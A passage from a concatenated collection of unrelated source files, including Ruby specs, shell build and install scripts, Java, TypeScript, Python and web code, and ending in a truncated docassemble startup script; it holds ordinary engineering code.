@cloud.should_receive(:copy_template_to_storage_directory).with("pop", true).once
@cloud.stub!(:copy_template_to_storage_directory).and_return true
@cloud.copy_custom_templates
end
end
it "should copy_custom_monitors" do
@cloud.should_receive(:copy_custom_monitors).once
end
it "should call before_configuration_tasks callback" do
@cloud.should_receive(:before_configuration_tasks).once
end
it "should call call write_unique_cookie" do
@cloud.should_receive(:write_unique_cookie).once
end
# copy_custom_monitors itself is driven from this group's own after(:each).
describe "copy_custom_monitors" do
before(:each) do
Base.stub!(:custom_monitor_directories).and_return ["/tmp/monitors/custom_monitor.rb"]
Dir.stub!(:[]).with("#{Base.custom_monitor_directories}/*.rb").and_return ["/tmp/monitors/custom_monitor.rb"]
@cloud.stub!(:copy_misc_templates).and_return true
@cloud.stub!(:copy_file_to_storage_directory).and_return true
end
it "should call make_directory_in_storage_directory with monitors" do
@cloud.should_receive(:make_directory_in_storage_directory).with("monitors").once
@cloud.stub!(:make_directory_in_storage_directory)
end
it "should copy the monitors into the monitor directory" do
@cloud.should_receive(:copy_file_to_storage_directory).with("/tmp/monitors/custom_monitor.rb", "monitors").at_least(1)
@cloud.stub!(:copy_file_to_storage_directory).and_return true
end
after(:each) do
@cloud.copy_custom_monitors
end
end
it "should store_keys_in_file" do
@cloud.should_receive(:store_keys_in_file).once
end
it "should call save! on Script" do
Script.should_receive(:save!).with(@cloud).once
end
it "should copy_ssh_key" do
@cloud.should_receive(:copy_ssh_key).once
end
# Triggers all of the expectations set in the examples above.
after(:each) do
@cloud.prepare_for_configuration
end
end
# When a manifest already exists on disk it is read back verbatim instead of
# being regenerated from the cloud's resources.
describe "building with an existing manifest" do
before(:each) do
@file = "/etc/puppet/manifests/nodes/nodes.pp"
@file.stub!(:read).and_return "nodes generate"
::FileTest.stub!(:file?).with("/etc/puppet/manifests/classes/poolparty.pp").and_return true
@cloud.stub!(:open).with("/etc/puppet/manifests/classes/poolparty.pp").and_return @file
end
it "should not call resources_string_from_resources if the file /etc/puppet/manifests/nodes/nodes.pp exists" do
@cloud.should_not_receive(:add_poolparty_base_requirements)
@cloud.build_manifest
end
it "should build from the existing file" do
@cloud.build_manifest.should == "nodes generate"
end
end
end
describe "minimum_runnable_options" do
it "should be an array on the cloud" do
@cloud.minimum_runnable_options.class.should == Array
end
# Generate one example per required option key via eval of a heredoc.
["keypair","minimum_instances","maximum_instances",
"expand_when","contract_when","set_master_ip_to"].each do |k|
eval <<-EOE
it "should have #{k} in the minimum_runnable_options" do
@cloud.minimum_runnable_options.include?(:#{k}).should == true
end
EOE
end
it "should include the custom_minimum_runnable_options" do
@cloud.stub!(:custom_minimum_runnable_options).and_return [:blank]
@cloud.minimum_runnable_options.include?(:blank).should == true
end
end
# The cookie string is a SHA256 digest of the full keypair name plus the
# cloud name, so it must be deterministic across calls.
describe "unique_cookie" do
# Typo fix in the example name: dropped the duplicated word "generate".
it "should have the method generate_unique_cookie_string" do
@cloud.respond_to?(:generate_unique_cookie_string).should == true
end
it "should call hexdigest to digest/sha" do
Digest::SHA256.should_receive(:hexdigest).with("#{@cloud.full_keypair_name}#{@cloud.name}").and_return "blaaaaah"
@cloud.generate_unique_cookie_string
end
it "should generate the same cookie string every time" do
older = @cloud.generate_unique_cookie_string
old = @cloud.generate_unique_cookie_string
new_one = @cloud.generate_unique_cookie_string
older.should == old
old.should == new_one
new_one.should == older
end
end
end
# A cloud with a stubbed remote instance list must expose a master node.
describe "instances" do
before(:each) do
@cloud3 = cloud :pop do;keypair "fake_keypair";end
stub_list_from_remote_for(@cloud3)
end
it "should respond to the method master" do
@cloud3.respond_to?(:master).should == true
end
it "should return a master that is not nil" do
@cloud3.master.should_not be_nil
end
end
end
end
end |
#!/bin/bash
# Create a non-root application user in the init database.
# Fix: removed "set -x" — it traced every expanded command, which wrote
# MONGO_NON_ROOT_PASSWORD in clear text into the container logs.

# Default role for the non-root user when none is supplied.
MONGO_NON_ROOT_ROLE="${MONGO_NON_ROOT_ROLE:-readWrite}"

if [ -n "${MONGO_NON_ROOT_USERNAME:-}" ] && [ -n "${MONGO_NON_ROOT_PASSWORD:-}" ]; then
# "${mongo[@]}" and _js_escape are provided by the surrounding
# docker-entrypoint environment that sources this script.
"${mongo[@]}" "$MONGO_INITDB_DATABASE" <<-EOJS
db.createUser({
user: $(_js_escape "$MONGO_NON_ROOT_USERNAME"),
pwd: $(_js_escape "$MONGO_NON_ROOT_PASSWORD"),
roles: [ { role: $(_js_escape "$MONGO_NON_ROOT_ROLE"), db: $(_js_escape "$MONGO_INITDB_DATABASE") } ]
})
EOJS
else
# Fail fast, and say why, so the container doesn't come up half-configured.
echo "MONGO_NON_ROOT_USERNAME and MONGO_NON_ROOT_PASSWORD must both be set" >&2
exit 1
fi
<filename>src/main/java/org/goldenorb/OrbTracker.java
/**
* Licensed to Ravel, Inc. under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. Ravel, Inc. licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.goldenorb;
import java.io.IOException;
import java.net.UnknownHostException;
import org.apache.hadoop.filecache.DistributedCache;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.ipc.RPC;
import org.apache.hadoop.ipc.RPC.Server;
import org.apache.zookeeper.CreateMode;
import org.apache.zookeeper.ZooKeeper;
import org.goldenorb.conf.OrbConfigurable;
import org.goldenorb.conf.OrbConfiguration;
import org.goldenorb.event.OrbCallback;
import org.goldenorb.event.OrbEvent;
import org.goldenorb.event.OrbExceptionEvent;
import org.goldenorb.jet.OrbTrackerMember;
import org.goldenorb.jet.PartitionRequest;
import org.goldenorb.jet.PartitionRequestResponse;
import org.goldenorb.net.OrbDNS;
import org.goldenorb.util.ResourceAllocator;
import org.goldenorb.zookeeper.LeaderGroup;
import org.goldenorb.zookeeper.OrbZKFailure;
import org.goldenorb.zookeeper.ZookeeperUtils;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
/**
 * OrbTracker extends {@link OrbTrackerMember}, which allows them to run as either
 * leaders or slaves. The leader OrbTracker is responsible for creating the LeaderGroup and coordinating
 * with other OrbTrackers via ZooKeeper and Hadoop RPC. OrbTracker also starts the {@link JobManager}
 * and {@link OrbPartitionManager}.
 *
 */
public class OrbTracker extends OrbTrackerMember implements Runnable, OrbConfigurable {
public static final String ZK_BASE_PATH = "/GoldenOrb";
private final Logger logger = LoggerFactory.getLogger(OrbTracker.class);
// private OrbConfiguration orbConf;
private ZooKeeper zk;
private LeaderGroup<OrbTrackerMember> leaderGroup;
private Server server = null;
// Guarded by synchronized(this); flipped in executeAsLeader/executeAsSlave.
private boolean leader = false;
// Only non-null while this tracker is the leader.
private JobManager<OrbTrackerMember> jobManager;
private OrbCallback orbCallback;
// Main loop flag; cleared by leave() to let waitLoop() terminate.
private boolean runTracker = true;
private ResourceAllocator<OrbTrackerMember> resourceAllocator;
private OrbPartitionManager<OrbPartitionProcess> partitionManager;
/**
 * Entry point: starts a single OrbTracker thread configured from the
 * default OrbConfiguration.
 *
 * @param args command-line arguments (unused)
 */
public static void main(String[] args) {
new Thread(new OrbTracker(new OrbConfiguration(true))).start();
}
/**
 * Constructor
 *
 * @param orbConf the configuration this tracker runs under
 */
public OrbTracker(OrbConfiguration orbConf) {
setOrbConf(orbConf);
}
/**
 * Startup sequence: resolve hostname/port, start the Hadoop RPC server and
 * partition manager, connect to ZooKeeper, join the cluster tree, then run
 * as leader or slave depending on the LeaderGroup election result.
 * Any failure in these steps terminates the JVM with exit code -1.
 */
public void run() {
// get hostname
try {
setHostname(OrbDNS.getDefaultHost(getOrbConf()));
setPort(getOrbConf().getOrbTrackerPort());
// NOTE(review): message concatenates hostname and port with no separator.
logger.info("Starting OrbTracker on: " + getHostname() + getPort());
} catch (UnknownHostException e) {
logger.error("Unable to get hostname.", e);
System.exit(-1);
}
// startServer
try {
logger.info("starting RPC server on " + getHostname() + ":" + getPort());
server = RPC.getServer(this, getHostname(), getPort(), getOrbConf());
server.start();
logger.info("starting OrbPartitionManager");
// change from MockPartitionThread to OrbPartitionProcess
partitionManager = new OrbPartitionManager<OrbPartitionProcess>(getOrbConf(), OrbPartitionProcess.class);
} catch (IOException e) {
// NOTE(review): copied error text — this failure is the RPC server, not hostname.
logger.error("Unable to get hostname.", e);
System.exit(-1);
}
// connect to zookeeper
try {
establishZookeeperConnection();
} catch (Exception e) {
logger.error("Failed to connect to Zookeeper", e);
System.exit(-1);
}
// establish the zookeeper tree and join the cluster
try {
establishZookeeperTree();
} catch (OrbZKFailure e) {
logger.error("Major Zookeeper Error: ", e);
System.exit(-1);
}
if (leaderGroup.isLeader()) {
executeAsLeader();
} else {
executeAsSlave();
}
}
/**
 * Switches this tracker into slave mode: drops the leader flag, shuts down
 * any JobManager left over from a previous leadership stint, then blocks in
 * waitLoop() until the next leadership change.
 */
private void executeAsSlave() {
synchronized (this) {
leader = false;
if (jobManager != null) {
jobManager.shutdown();
}
}
waitLoop();
}
/**
 * Switches this tracker into leader mode: builds the resource allocator and
 * JobManager over the current group membership, then blocks in waitLoop().
 */
private void executeAsLeader() {
synchronized (this) {
resourceAllocator = new ResourceAllocator<OrbTrackerMember>(getOrbConf(), leaderGroup.getMembers());
leader = true;
orbCallback = new OrbTrackerCallback();
jobManager = new JobManager<OrbTrackerMember>(orbCallback, getOrbConf(), zk, resourceAllocator,
leaderGroup.getMembers());
}
waitLoop();
}
/**
 * Parks the thread until notify()'d by OrbTrackerCallback on a leadership
 * change, then re-enters the appropriate execute* method.
 * NOTE(review): executeAsLeader/executeAsSlave call back into waitLoop(),
 * so every leadership flip adds a stack frame rather than returning —
 * confirm this is intended before long-running deployments.
 */
private void waitLoop() {
while (runTracker) {
synchronized (this) {
try {
wait();
} catch (InterruptedException e) {
logger.error(e.getMessage());
}
}
if (leaderGroup.isLeader()) {
executeAsLeader();
} else {
executeAsSlave();
}
}
}
/**
 * Creates the /GoldenOrb/<cluster>/OrbTrackers tree if absent, registers
 * this host as an EPHEMERAL node (exiting if one already exists for this
 * hostname), initializes partition counters, and joins the leader group.
 */
private void establishZookeeperTree() throws OrbZKFailure {
ZookeeperUtils.notExistCreateNode(zk, ZK_BASE_PATH);
ZookeeperUtils.notExistCreateNode(zk, ZK_BASE_PATH + "/" + getOrbConf().getOrbClusterName());
ZookeeperUtils.notExistCreateNode(zk, ZK_BASE_PATH + "/" + getOrbConf().getOrbClusterName() + "/OrbTrackers");
if (ZookeeperUtils.nodeExists(zk, ZK_BASE_PATH + "/" + getOrbConf().getOrbClusterName() + "/OrbTrackers/"
+ getHostname())) {
logger.info("Already have an OrbTracker on " + getHostname() + "(Exiting)");
System.exit(-1);
} else {
ZookeeperUtils.tryToCreateNode(zk, ZK_BASE_PATH + "/" + getOrbConf().getOrbClusterName() + "/OrbTrackers/"
+ getHostname(), CreateMode.EPHEMERAL);
}
this.setAvailablePartitions(getOrbConf().getNumberOfPartitionsPerMachine());
this.setInUsePartitions(0);
this.setReservedPartitions(0);
this.setLeader(false);
this.setPartitionCapacity(getOrbConf().getNumberOfPartitionsPerMachine());
leaderGroup = new LeaderGroup<OrbTrackerMember>(zk, new OrbTrackerCallback(),
ZK_BASE_PATH + "/" + getOrbConf().getOrbClusterName() + "/OrbTrackerLeaderGroup", this,
OrbTrackerMember.class);
}
/**
 * Callback invoked by the LeaderGroup; wakes the waitLoop when this
 * tracker's leader/slave role no longer matches the group's election state.
 */
public class OrbTrackerCallback implements OrbCallback {
/**
 * Dispatches on the event type: prints orb exceptions, and on a
 * leadership change notifies the parked tracker thread if its role flipped.
 *
 * @param e the event delivered by the leader group
 */
@Override
public void process(OrbEvent e) {
int eventCode = e.getType();
if (eventCode == OrbEvent.ORB_EXCEPTION) {
((OrbExceptionEvent) e).getException().printStackTrace();
} else if (eventCode == OrbEvent.LEADERSHIP_CHANGE) {
synchronized (OrbTracker.this) {
if ((leaderGroup.isLeader() && !leader) || (!leaderGroup.isLeader() && leader)) {
OrbTracker.this.notify();
}
}
}
}
}
/**
 * Leaves the leader group and shuts down the JobManager (if leader),
 * allowing waitLoop() to exit on its next iteration.
 */
public void leave() {
runTracker = false;
leaderGroup.leave();
if (jobManager != null) {
jobManager.shutdown();
}
}
/**
 * Connects to the ZooKeeper quorum named in the configuration.
 */
private void establishZookeeperConnection() throws IOException, InterruptedException {
zk = ZookeeperUtils.connect(getOrbConf().getOrbZooKeeperQuorum());
}
/**
 * Launches the partitions described by the request on this machine.
 * NOTE(review): always returns null — the response object is declared but
 * never populated; confirm callers tolerate a null response.
 *
 * @param request the partition request from the leader
 * @return currently always null
 */
@Override
public PartitionRequestResponse requestPartitions(PartitionRequest request) {
logger.info("requestPartitions");
PartitionRequestResponse response = null;
try {
partitionManager.launchPartitions(request);
} catch (InstantiationException e) {
logger.error(e.getMessage());
} catch (IllegalAccessException e) {
logger.error(e.getMessage());
}
return response;
}
/** Kills all partitions belonging to the given job on this machine. */
@Override
public void killJob(String jobNumber){
partitionManager.kill(jobNumber);
}
/**
 * Copies the job's distributed files from HDFS to a job-scoped directory
 * under java.io.tmpdir. IO failures are logged and swallowed (the commented
 * rethrow suggests this is a deliberate best-effort).
 *
 * @param jobConf the job configuration listing the HDFS files
 */
@Override
public void getRequiredFiles(OrbConfiguration jobConf) throws OrbZKFailure{
logger.info("jobConf.getHDFSdistributedFiles(): {}", jobConf.getHDFSdistributedFiles());
try {
Path[] hdfsPaths = jobConf.getHDFSdistributedFiles();
if (hdfsPaths != null) {
String baseLocalPath = System.getProperty("java.io.tmpdir") + "/GoldenOrb/"
+ jobConf.getOrbClusterName() + "/" + jobConf.getJobNumber() + "/";
FileSystem fs = FileSystem.get(jobConf);
for (Path path : hdfsPaths) {
String[] name = path.toString().split("/");
fs.copyToLocalFile(path, new Path(baseLocalPath + name[name.length - 1]));
logger.info(path.toString() + " copied from HDFS to local machine at " + baseLocalPath
+ name[name.length - 1]);
}
}
} catch (IOException e) {
logger.error("EXCEPTION occured while copying files from HDFS to local machine : " + e.getMessage());
e.printStackTrace();
//throw new OrbZKFailure(e);
}
}
}
|
import {Router} from '../index'
// Spin up two debug-enabled routers, each bound to its own local TCP endpoint.
const runRouter = async () => {
  const endpoints = ['tcp://127.0.0.1:5039', 'tcp://127.0.0.1:5040']

  const router1 = new Router({ id: 'TestRouter1', options: {layer: 'RouterLayer1'} })
  const router2 = new Router({ id: 'TestRouter2', options: {layer: 'RouterLayer2'} })

  for (const router of [router1, router2]) {
    router.debugMode(true)
  }

  await router1.bind(endpoints[0])
  await router2.bind(endpoints[1])

  // setTimeout(async () => {
  //   console.log(`Start unbind from ${endpoints[0]} .... `)
  //   await router1.unbind()
  //   console.log(`Finish unbind from ${endpoints[0]} .... `)
  // }, 10000)
}

runRouter()
|
#!/bin/bash
# Install and configure the Google Cloud SDK inside a Travis CI build.
set -ex

# Guard: this script mutates global gcloud config, so refuse to run outside CI.
# Fix: quote and default the variable — the original unquoted `[ $TRAVIS != ... ]`
# was a test-syntax error whenever TRAVIS was unset.
if [ "${TRAVIS:-}" != "true" ]; then
  echo "This should only be run from travis."
  exit 1
fi

pushd /tmp

# Get the SDK tar and untar it.
TARFILE=google-cloud-sdk.tar.gz
wget https://dl.google.com/dl/cloudsdk/release/$TARFILE
tar xzf $TARFILE
rm $TARFILE

# Install the SDK non-interactively, without touching PATH or shell completion.
./google-cloud-sdk/install.sh \
  --usage-reporting false \
  --path-update false \
  --command-completion false

gcloud -q components update
gcloud -q components install app-engine-go

# Set config (quote the env vars so empty/space values fail loudly in gcloud,
# not in shell word splitting).
gcloud config set disable_prompts True
gcloud config set project "$GOLANG_SAMPLES_PROJECT_ID"
gcloud config set app/promote_by_default false

gcloud auth activate-service-account --key-file "$GOOGLE_APPLICATION_CREDENTIALS"

# Diagnostic information.
gcloud info

popd
|
#!/bin/bash -xeu
# Build two Zephyr samples (hello_world and the shell module) for the
# mimxrt1064_evk board with the ARM MPU disabled, and collect the ELFs
# into ./artifacts.
export ZEPHYR_TOOLCHAIN_VARIANT=zephyr
export ZEPHYR_BASE=$(pwd)/zephyr/zephyr
export ZEPHYR_SDK_INSTALL_DIR=$(pwd)/zephyr/sdk
mkdir -p artifacts
pushd $ZEPHYR_BASE/samples/hello_world
# Derive an MPU-less config from the sample's default prj.conf.
cp prj.conf prj-no-mpu.conf
echo "CONFIG_ARM_MPU=n" >> prj-no-mpu.conf
west build -p auto -b mimxrt1064_evk -- -G'Unix Makefiles' -DCONF_FILE=prj-no-mpu.conf
popd
cp $ZEPHYR_BASE/samples/hello_world/build/zephyr/zephyr.elf artifacts/zephyr-hello_world.elf
pushd $ZEPHYR_BASE/samples/subsys/shell/shell_module
# Same MPU-less tweak for the shell sample.
cp prj.conf prj-no-mpu.conf
echo "CONFIG_ARM_MPU=n" >> prj-no-mpu.conf
west build -p auto -b mimxrt1064_evk -- -G'Unix Makefiles' -DCONF_FILE=prj-no-mpu.conf
popd
cp $ZEPHYR_BASE/samples/subsys/shell/shell_module/build/zephyr/zephyr.elf artifacts/zephyr-shell_module.elf
|
#!/bin/sh
# Sleep 15 seconds to give the VPN time to connect.
sleep 15
# Install curl (Alpine); --no-cache avoids leaving an apk index behind.
apk add --no-cache curl
# Display the current public IP address, which should now be the VPN's.
echo "Your IP address from VPN:"
curl -s http://icanhazip.com/
|
#!/usr/bin/env bash
###############################################################################
# Copyright 2018 The Apollo Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
# Get the absolute path.
# Convert each argument to an absolute path before handing the set to the
# navigator tool (which runs from /apollo, so relative paths would break).
# Fix: quote "$@" and every ${file_name} expansion — the originals were
# unquoted and split file names containing spaces into multiple words.
i=0;
for file_name in "$@"
do
DIR=$(cd "$(dirname "${file_name}")" && pwd)
FILE_NAME=$(basename "${file_name}")
PATH_NAME[i++]="${DIR}/${FILE_NAME}"
done
#echo "${PATH_NAME[@]}"
cd /apollo
./bazel-bin/modules/map/relative_map/tools/navigator "${PATH_NAME[@]}"
|
/* eslint-disable max-classes-per-file,import/export */
// Ambient type declarations for the "hummus" PDF library (no runtime code).
declare module 'hummus' {
import {EventEmitter} from 'events';
/** Writes/modifies PDF documents; pages are drawn via content contexts. */
export class PDFWriter {
end(): void;
getEvents(): EventEmitter;
triggerDocumentExtensionEvent(eventName: string, eventParams: any): void;
startPageContentContext(page: number): PDFPageContentContext;
pausePageContentContext(context: PDFPageContentContext): void;
getImageDimensions(
imageFilePath: string,
): {
width: number;
height: number;
};
createImageXObjectFromJPG(imageFilePath: string): XObject;
createFormXObjectFromJPG(imageFilePath: string): XObject;
createFormXObjectFromPNG(imageFilePath: string): XObject;
}
/** Base write stream abstraction consumed by PDFWriter. */
export class PDFWStream {
write(inBytesArray: number[]): number;
getCurrentPosition(): number;
}
/** Write stream backed by a file on disk. */
export class PDFWStreamForFile extends PDFWStream {
constructor(inPath: string);
close(cb: () => void): void;
}
/** Write stream backed by an in-memory buffer. */
export class PDFWStreamForBuffer extends PDFWStream {
constructor();
}
/** Base read stream abstraction (random access via setPosition/skip). */
export class PDFRStream {
read(inAmount: number): number;
notEnded(): boolean;
setPosition(inPosition: number): void;
setPositionFromEnd(inPosition: number): void;
skip(inAmount: number): void;
getCurrentPosition(): number;
}
/** Read stream backed by a file on disk. */
export class PDFRStreamForFile extends PDFRStream {
constructor(inPath: string);
close(inCallback: () => void): void;
}
/** Read stream backed by an existing Buffer. */
export class PDFRStreamForBuffer extends PDFRStream {
constructor(buffer: Buffer);
}
/** Edits an existing page in place via start/endContext. */
export class PDFPageModifier {
constructor(pdfWriter: PDFWriter, pageIndex: number, graphicsFlag?: boolean);
startContext(): PDFPageContentContext;
endContext(): PDFPageContentContext;
}
export enum ImageFit {
always = 'always',
overflow = 'overflow',
}
/** Options for PDFPageContentContext.drawImage. */
export interface ImageOptions {
index?: number;
transformation?:
| number[]
| {
width: number;
height: number;
proportional?: boolean;
fit?: ImageFit;
};
}
export type XObject = Record<string, unknown>;
/** Drawing surface for a page; q/Q/cm mirror PDF graphics-state operators. */
export class PDFPageContentContext {
constructor();
getContext(): PDFPageContentContext;
writePage(): void;
drawImage(x: number, y: number, imageFilePath: string, options?: ImageOptions): void;
q(): PDFPageContentContext;
Q(): PDFPageContentContext;
cm(a: number, b: number, c: number, d: number, e: number, f: number): PDFPageContentContext;
doXObject(xObject: XObject): PDFPageContentContext;
}
export function createWriterToModify(inFilePath: string, inOptionsObject?: Record<string, unknown>): PDFWriter;
export function createWriterToModify(ifSourceStream: PDFRStream, inTargetStream: PDFWStream, inOptionsObject?: Record<string, unknown>): PDFWriter;
}
|
<gh_stars>1-10
package org.jaudiotagger.issues;
import org.jaudiotagger.AbstractTestCase;
import org.jaudiotagger.audio.mp3.MP3File;
import org.jaudiotagger.tag.FieldKey;
import org.jaudiotagger.tag.id3.ID3v11Tag;
import org.jaudiotagger.tag.id3.ID3v23Tag;
import java.io.File;
/**
 * Issue 420: a field written only to the ID3v1 tag (here, the year) should
 * survive a save and be readable back, without leaking into the ID3v2 tag.
 * (The previous comment described an unrelated track-total test.)
 */
public class Issue420Test extends AbstractTestCase
{
public void testReadingFieldsThatOnlyExistInID3v1tag() throws Exception
{
File testFile = AbstractTestCase.copyAudioToTmp("testV1.mp3", new File("testReadingFieldsThatOnlyExistInID3v1tag.mp3"));
MP3File mp3File = new MP3File(testFile);
// The fixture starts with no tags at all.
assertFalse(mp3File.hasID3v1Tag());
assertFalse(mp3File.hasID3v2Tag());
mp3File.setID3v1Tag(new ID3v11Tag());
mp3File.setID3v2Tag(new ID3v23Tag());
// Write the year to the v1 tag only.
mp3File.getID3v1Tag().setYear("1971");
//TODO this seems wrong
assertNull(mp3File.getTag());
mp3File.save();
mp3File = new MP3File(testFile);
assertNotNull(mp3File.getTag());
// The v2 tag stays empty; only the v1 tag holds the year.
assertEquals(0,mp3File.getTag().getFields("TYER").size());
assertEquals(0,mp3File.getTag().getFields(FieldKey.YEAR).size());
assertEquals(1,mp3File.getID3v1Tag().getFields(FieldKey.YEAR).size());
}
}
|
// Array indexing demo: pick out the element at index 1.
const colors = ['red', 'blue', 'green'];
const [, secondColor] = colors; // destructuring instead of a numeric index
console.log(secondColor); // Output: blue
package seoul.democracy.issue.domain;
import lombok.AllArgsConstructor;
import lombok.Getter;
import lombok.NoArgsConstructor;
import org.springframework.util.CollectionUtils;
import seoul.democracy.issue.dto.IssueFileDto;
import javax.persistence.Column;
import javax.persistence.Embeddable;
import java.util.ArrayList;
import java.util.List;
/**
 * Issue attachment file, embedded into the issue row.
 */
@Getter
@Embeddable
@NoArgsConstructor
@AllArgsConstructor(staticName = "create")
public class IssueFile {
/**
 * File sequence number (position within the issue's file list).
 */
@Column(name = "FILE_SEQ")
private Integer seq;
/**
 * File name.
 */
@Column(name = "FILE_NAME")
private String name;
/**
 * File URL.
 */
@Column(name = "FILE_URL")
private String url;
/**
 * Builds IssueFile entries from DTOs, assigning list position as seq.
 * NOTE: returns null (not an empty list) when the input is null or empty —
 * callers rely on this, so it is documented rather than changed.
 */
public static List<IssueFile> create(List<IssueFileDto> createFiles) {
if (CollectionUtils.isEmpty(createFiles)) return null;
List<IssueFile> files = new ArrayList<>();
for (int i = 0; i < createFiles.size(); i++) {
IssueFileDto fileDto = createFiles.get(i);
files.add(IssueFile.create(i, fileDto.getName(), fileDto.getUrl()));
}
return files;
}
}
|
import sqlite3


class ContactManager:
    """Minimal name -> email store backed by a SQLite database.

    The caller is responsible for ensuring the ``contacts`` table exists
    and for calling :meth:`destroy` when finished.
    """

    def __init__(self, db_name):
        """Open a connection to ``db_name`` (a file path or ``":memory:"``)."""
        self.connection = sqlite3.connect(db_name)

    def add_contact(self, name, email):
        """Insert a contact row (parameterized; safe against SQL injection)."""
        # Using the connection as a context manager commits on success and
        # rolls back if the INSERT raises — the original committed manually
        # and leaked the cursor on error.
        with self.connection:
            self.connection.execute(
                "INSERT INTO contacts (name, email) VALUES (?, ?)", (name, email)
            )

    def get_contact(self, name):
        """Return the email for ``name``, or None when no such contact exists."""
        cursor = self.connection.cursor()
        try:
            cursor.execute("SELECT email FROM contacts WHERE name=?", (name,))
            contact = cursor.fetchone()
        finally:
            # Close the cursor even when the query raises.
            cursor.close()
        return contact[0] if contact else None

    def destroy(self):
        """Close the underlying database connection."""
        self.connection.close()
<html>
<head>
<title>To-Do List App</title>
</head>
<body>
<h1>To-Do List</h1>
<!-- Fix: the original embedded JSX (React syntax: {list.map(...)}, useState)
     directly in static HTML with no React runtime loaded, so the page could
     not render or run. Rewritten with plain DOM APIs, same behavior:
     show the list, append the typed item on submit, clear the input. -->
<ul id="list"></ul>
<form id="todo-form">
<input type="text" id="todo-input" />
<button>Add Item</button>
</form>
<script>
const list = ['Dishes', 'Laundry'];
const listEl = document.getElementById('list');
const formEl = document.getElementById('todo-form');
const inputEl = document.getElementById('todo-input');

// Re-render the whole list; fine at this scale.
function render() {
  listEl.innerHTML = '';
  for (const item of list) {
    const li = document.createElement('li');
    li.textContent = item; // textContent avoids HTML injection
    listEl.appendChild(li);
  }
}

formEl.addEventListener('submit', (e) => {
  e.preventDefault();
  list.push(inputEl.value);
  inputEl.value = '';
  render();
});

render();
</script>
</body>
</html>
import React from 'react';
import Head from 'next/head';
import Link from 'next/link';
// Landing page: links to the two Minesweeper ("Buscaminas") UI variants.
export default (): JSX.Element => (
<React.Fragment>
<Head>
<title>Buscaminas</title>
<link rel="stylesheet" type="text/css" href="/static/style.css" />
</Head>
<h1>Buscaminas</h1>
<p>
<Link href="/styleA">
<a className="menu">Versión A</a>
</Link>
</p>
<p>
<Link href="/styleB">
<a className="menu">Versión B</a>
</Link>
</p>
</React.Fragment>
);
|
#! /bin/bash
export HOME=/root
export DA_ROOT="${DA_ROOT:-/usr/share/docassemble}"
export DAPYTHONVERSION="${DAPYTHONVERSION:-3}"
export DA_DEFAULT_LOCAL="local3.8"
export DA_ACTIVATE="${DA_PYTHON:-${DA_ROOT}/${DA_DEFAULT_LOCAL}}/bin/activate"
echo "Activating with ${DA_ACTIVATE}"
source "${DA_ACTIVATE}"
export DA_CONFIG_FILE_DIST="${DA_CONFIG_FILE_DIST:-${DA_ROOT}/config/config.yml.dist}"
export DA_CONFIG_FILE="${DA_CONFIG:-${DA_ROOT}/config/config.yml}"
export CONTAINERROLE=":${CONTAINERROLE:-all}:"
function cmd_retry() {
    # Retry a command up to 4 times with quadratic backoff (1s, 4s, 9s).
    # Fix: the original collapsed "$@" into a single string (`local -r cmd="$@"`)
    # and re-expanded it unquoted, so arguments containing spaces were split
    # back into separate words. Keep the command as an array instead.
    local -a cmd=("$@")
    local -r -i max_attempts=4
    local -i attempt_num=1
    until "${cmd[@]}"
    do
        if ((attempt_num==max_attempts))
        then
            echo "Attempt $attempt_num failed. Not trying again"
            return 1
        else
            # Log the command once, on the first failure only.
            if ((attempt_num==1)); then
                echo "${cmd[@]}"
            fi
            echo "Attempt $attempt_num failed."
            sleep $(((attempt_num++)**2))
        fi
    done
}
echo "config.yml is at" $DA_CONFIG_FILE >&2
echo "1" >&2
export DEBIAN_FRONTEND=noninteractive
if [ "${DAALLOWUPDATES:-true}" == "true" ]; then
apt-get clean &> /dev/null
apt-get -q -y update &> /dev/null
fi
echo "2" >&2
if [ -f /var/run/apache2/apache2.pid ]; then
APACHE_PID=$(</var/run/apache2/apache2.pid)
if kill -0 $APACHE_PID &> /dev/null; then
APACHERUNNING=true
else
rm -f /var/run/apache2/apache2.pid
APACHERUNNING=false
fi
else
APACHERUNNING=false
fi
if [ -f /var/run/nginx.pid ]; then
NGINX_PID=$(</var/run/nginx.pid)
if kill -0 $NGINX_PID &> /dev/null; then
NGINXRUNNING=true
else
rm -f /var/run/nginx.pid
NGINXRUNNING=false
fi
else
NGINXRUNNING=false
fi
echo "3" >&2
if [[ $CONTAINERROLE =~ .*:(all|redis):.* ]] && redis-cli ping &> /dev/null; then
REDISRUNNING=true
else
REDISRUNNING=false
fi
echo "4" >&2
if [ -f /var/run/crond.pid ]; then
CRON_PID=$(</var/run/crond.pid)
if kill -0 $CRON_PID &> /dev/null; then
CRONRUNNING=true
else
rm -f /var/run/crond.pid
CRONRUNNING=false
fi
else
CRONRUNNING=false
fi
echo "5" >&2
if [ "${USEHTTPS:-false}" == "false" ] && [ "${BEHINDHTTPSLOADBALANCER:-false}" == "false" ]; then
URLROOT="http:\\/\\/"
else
URLROOT="https:\\/\\/"
fi
echo "6" >&2
if [ "${DAHOSTNAME:-none}" != "none" ]; then
URLROOT="${URLROOT}${DAHOSTNAME}"
else
if [ "${EC2:-false}" == "true" ]; then
PUBLIC_HOSTNAME=`curl -s http://169.254.169.254/latest/meta-data/public-hostname`
else
PUBLIC_HOSTNAME=`hostname --fqdn`
fi
URLROOT="${URLROOT}${PUBLIC_HOSTNAME}"
fi
echo "7" >&2
if [ "${S3ENABLE:-null}" == "null" ] && [ "${S3BUCKET:-null}" != "null" ]; then
export S3ENABLE=true
fi
echo "8" >&2
